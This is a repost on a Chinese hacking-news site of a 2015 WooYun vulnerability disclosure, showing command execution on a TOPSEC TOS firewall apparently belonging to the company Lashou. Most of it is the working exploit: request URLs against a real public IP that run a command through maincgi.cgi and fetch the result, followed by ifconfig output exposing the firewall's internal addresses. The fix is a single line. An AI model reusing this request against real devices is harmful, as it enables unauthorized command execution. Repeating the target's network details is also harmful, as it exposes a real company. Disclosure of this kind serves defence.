记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

拉手网某系统命令执行

2015-12-19 16:00

拉手网的TOPSEC TOS 防火墙设备存在命令执行



code 区域
https://59.151.89.6:8080/cgi/maincgi.cgi?Url=Command&Action=id&Para=id



命令执行后

通过

code 区域
https://59.151.89.6:8080/cgi/maincgi.cgi?Url=CommandResult



查看返回结果



漏洞证明:

lashou1111111.jpg



lashou2222222.jpg



看了下内网IP

code 区域
dummy Link encap:Point-to-Point Protocol

inet addr:1.2.3.4 P-t-P:1.2.3.4 Mask:255.255.255.255

UP POINTOPOINT RUNNING NOARP MULTICAST MTU:65534 Metric:1

RX packets:0 errors:0 dropped:0 overruns:0 frame:0

TX packets:160915315 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:0 (0.0 b) TX bytes:3167400654 (3020.6 Mb)



eth0 Link encap:Ethernet HWaddr 00:13:32:0A:61:B2

inet addr:192.168.1.254 Bcast:192.168.1.255 Mask:255.255.255.0

UP BROADCAST MULTICAST MTU:1500 Metric:1

RX packets:0 errors:0 dropped:0 overruns:0 frame:0

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:100

RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

Interrupt:10 Base address:0xbc00 Memory:fe9e0000-fea00000



eth1 Link encap:Ethernet HWaddr 00:13:32:0A:61:B3

UP BROADCAST MULTICAST MTU:1500 Metric:1

RX packets:0 errors:0 dropped:0 overruns:0 frame:0

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:100

RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

Interrupt:5 Base address:0xcc00 Memory:feae0000-feb00000



eth10 Link encap:Ethernet HWaddr 00:13:32:06:16:54

inet addr:10.168.22.1 Bcast:10.168.22.255 Mask:255.255.255.0

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:2505880170 errors:0 dropped:0 overruns:0 frame:0

TX packets:4028329592 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:100

RX bytes:3968265358 (3784.4 Mb) TX bytes:2382826955 (2272.4 Mb)



与之前拉手内外网段一只,外网也是拉手某C段ip,可以断定是拉手的设备。

修复方案:

限制下maincgi.cgi访问权限。

知识来源: www.wooyun.org/bugs/wooyun-2015-0160355

阅读:88457 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“拉手网某系统命令执行”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词